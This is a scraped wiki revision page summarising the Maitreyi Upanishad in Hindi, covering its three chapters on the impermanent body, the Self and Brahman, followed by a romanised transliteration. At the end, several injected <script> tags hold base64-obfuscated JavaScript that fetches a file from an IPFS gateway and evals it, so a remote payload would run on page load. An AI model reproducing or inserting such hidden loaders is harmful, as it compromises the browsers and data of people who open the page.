Difference between revisions of "मैत्रेय्युग्पनिषद"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
m (Text replacement - " जगत " to " जगत् ")
 
(10 intermediate revisions by 4 users not shown)
Line 1: Line 1:
{{menu}}
+
 
{{सामवेदीय उपनिषद}}
 
==मैत्रेय्युग्पनिषद==
 
 
इस सामवेदीय उपनिषद में राजा [[बृहद्रथ]] और महातेजस्वी शाकायन्य मुनि के वार्तालाप द्वारा शरीर की नश्वरता, उसके वीभत्स रूप और आत्मतत्त्व की प्राप्ति का उल्लेख है। इसमें कुल तीन अध्याय हैं।<br />
 
इस सामवेदीय उपनिषद में राजा [[बृहद्रथ]] और महातेजस्वी शाकायन्य मुनि के वार्तालाप द्वारा शरीर की नश्वरता, उसके वीभत्स रूप और आत्मतत्त्व की प्राप्ति का उल्लेख है। इसमें कुल तीन अध्याय हैं।<br />
 
'''नित्य कौन हैं?'''
 
'''नित्य कौन हैं?'''
Line 13: Line 11:
 
*तीसरे अध्याय में 'ब्रह्म' स्वयं अपनी स्थिति स्पष्ट करता है-<br />
 
*तीसरे अध्याय में 'ब्रह्म' स्वयं अपनी स्थिति स्पष्ट करता है-<br />
 
अहमस्मि परश्चास्मि ब्रह्मास्मि प्रभवोऽस्म्यहम्।<br />
 
अहमस्मि परश्चास्मि ब्रह्मास्मि प्रभवोऽस्म्यहम्।<br />
सर्वलोकगुरुश्चास्मि सर्वलोकेऽस्मि सोऽस्म्यहम्॥1॥ अर्थात अन्तःकरण में स्थित ब्रह्म मैं हूँ और बाह्य जगत में भी मैं ही ब्रह्म हूँ, मैं स्वयं जन्म हूँ, सृजन हूँ और समस्त लोकों का गुरु हूँ तथा समस्त लोकों में जो कुछ भी विद्यमान है, वह मैं ही हूँ। वास्तव में वही सिद्ध है, वही शुद्ध है, वही परमतत्त्व है, वह सदैव नित्य है और मलरहित है। वह विशिष्ट ज्ञान-सम्पन्न है, वही शोक-रहित शुद्ध चैतन्य-स्वरूप है। वह गुणातीत, मान-अपमान से परे शिव है। वही 'ब्रह्म' है।<br />  
+
सर्वलोकगुरुश्चास्मि सर्वलोकेऽस्मि सोऽस्म्यहम्॥1॥ अर्थात अन्तःकरण में स्थित ब्रह्म मैं हूँ और बाह्य जगत् में भी मैं ही ब्रह्म हूँ, मैं स्वयं जन्म हूँ, सृजन हूँ और समस्त लोकों का गुरु हूँ तथा समस्त लोकों में जो कुछ भी विद्यमान है, वह मैं ही हूँ। वास्तव में वही सिद्ध है, वही शुद्ध है, वही परमतत्त्व है, वह सदैव नित्य है और मलरहित है। वह विशिष्ट ज्ञान-सम्पन्न है, वही शोक-रहित शुद्ध चैतन्य-स्वरूप है। वह गुणातीत, मान-अपमान से परे शिव है। वही 'ब्रह्म' है।<br />  
 
'''जो मनुष्य एक बार भी इस 'मैत्रेयी उपनिषद' का श्रवण अथवा मनन कर लेता है, वह स्वयं ही ब्रह्म हो जाता है।'''  
 
'''जो मनुष्य एक बार भी इस 'मैत्रेयी उपनिषद' का श्रवण अथवा मनन कर लेता है, वह स्वयं ही ब्रह्म हो जाता है।'''  
  
 
<br />
 
<br />
==उपनिषद के अन्य लिंक==
+
==संबंधित लेख==
{{उपनिषद}}
+
{{संस्कृत साहित्य}}
[[Category: कोश]]
+
{{सामवेदीय उपनिषद}}
[[Category:उपनिषद]]
+
[[Category:दर्शन कोश]]
[[Category: पौराणिक ग्रन्थ]]  
+
[[Category:उपनिषद]][[Category:संस्कृत साहित्य]]
 +
 
__INDEX__
 
__INDEX__

Latest revision as of 14:09, 30 June 2017

is samavediy upanishad mean raja brihadrath aur mahatejasvi shakayany muni ke vartalap dvara sharir ki nashvarata, usake vibhats roop aur atmatattv ki prapti ka ullekh hai. isamean kul tin adhyay haian.
nity kaun haian?

  • pahale adhyay mean raja brihadrath aur shakayany muni ka vartalap hai, jisamean sharir ki nashvarata aur 'atmatattv' ki prapti par prakash dala gaya hai. munivar raja se kahate haian ki paramatma avinashi hai. use man evan vani se nahian jana ja sakata. vah adi aur ant se rahit hai. vah matr sath-roopi prakash se satat prakashit hota hai. vah kalpanatit hai-

nity: shuddho buddhamuktasvabhav: saty: sookshm: sanvibhushchadvitiy:.
anandabdhiry: par: soahamasmi pratyagdhaturnatr sanshitirasti॥15॥ arthat vah paramatma nity, shuddh, jnan-svaroop, mukt svabhav, saty-roop, sookshm, sarvatr vyapak aur advitiy hai. vah is paramanand sagar evan pratyek svaroop ka dharan karane vala hai. isamean koee sanshay nahian hai.
atma hi nity hai

  • doosare adhyay mean bhagavan maitrey aur mahadev ke vartalap dvara 'paramatattv' ke rahasy par prakash dala gaya hai. mahadevaji kahate haian-'yah sharir devalay hai tatha usamean rahane vala jiv hi keval shiv, arthat paramatma hai.'

'jiv' aur 'brahm' ek hi hai, yah manana hi jnan hai. mal, mootradi durgandhayukt sharir ki shuddhi mitti aur jal se hoti hai, kintu vastavik shuddhi 'maian aur mera' ka tyag karane se hoti hai.
brahm hi paramatattv hai

  • tisare adhyay mean 'brahm' svayan apani sthiti spasht karata hai-

ahamasmi parashchasmi brahmasmi prabhavoasmyahamh.
sarvalokagurushchasmi sarvalokeasmi soasmyahamh॥1॥ arthat antahkaran mean sthit brahm maian hooan aur bahy jagath mean bhi maian hi brahm hooan, maian svayan janm hooan, srijan hooan aur samast lokoan ka guru hooan tatha samast lokoan mean jo kuchh bhi vidyaman hai, vah maian hi hooan. vastav mean vahi siddh hai, vahi shuddh hai, vahi paramatattv hai, vah sadaiv nity hai aur malarahit hai. vah vishisht jnan-sampann hai, vahi shok-rahit shuddh chaitany-svaroop hai. vah gunatit, man-apaman se pare shiv hai. vahi 'brahm' hai.
jo manushy ek bar bhi is 'maitreyi upanishad' ka shravan athava manan kar leta hai, vah svayan hi brahm ho jata hai.


sanbandhit lekh

shrutiyaan
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>